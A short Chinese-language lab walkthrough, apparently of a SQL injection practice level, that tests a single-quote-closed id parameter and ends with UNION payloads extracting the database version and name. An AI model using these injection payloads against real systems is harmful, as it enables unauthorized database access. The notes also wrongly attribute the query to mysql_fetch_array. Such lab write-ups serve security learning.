知识点：

• mysqli_query() 
  • 
  • 返回值为资源型或布尔型
  • 如果内容为查询语句则返回资源型数据；如果内容为插入、更新、删除等语句则返回布尔类型结果
• mysql_fetch_array()
  • 
  • 从结果集中取出一行作为关联数组或数字数组
  • 输入内容为指定查询的结果集
• 单引号闭合绕过+联合注入

查看界面发现是一个id参数输入的，欸，这不是跟最开始的几关一样吗

尝试判断注入类型

构造payload:id=1/0

成功就得到了回显结果，说明是字符型注入

尝试单引号闭合

构造payload:id=1'

出现了语法错误的界面，发现好像利用了mysql_fetch_array()进行输入读取

成功爆出了语法错误，说明读取输入用到了单引号

构造payload:id=1''

正常回显，说明这里存在注入点，而且是单引号绕过

构造payload:id=0'+or+1='1

成功注入，说明这里的输入读取是mysql_fetch_array("select 1,2,3 from 表 where id ='输入内容'")

好了，尝试进行联合注入

构造payload:id=0'+union+select+1,2,3+'

接下来读取数据库名和版本信息

构造payload:id=0'+union+select+1,version(),database()+'

打完收工

10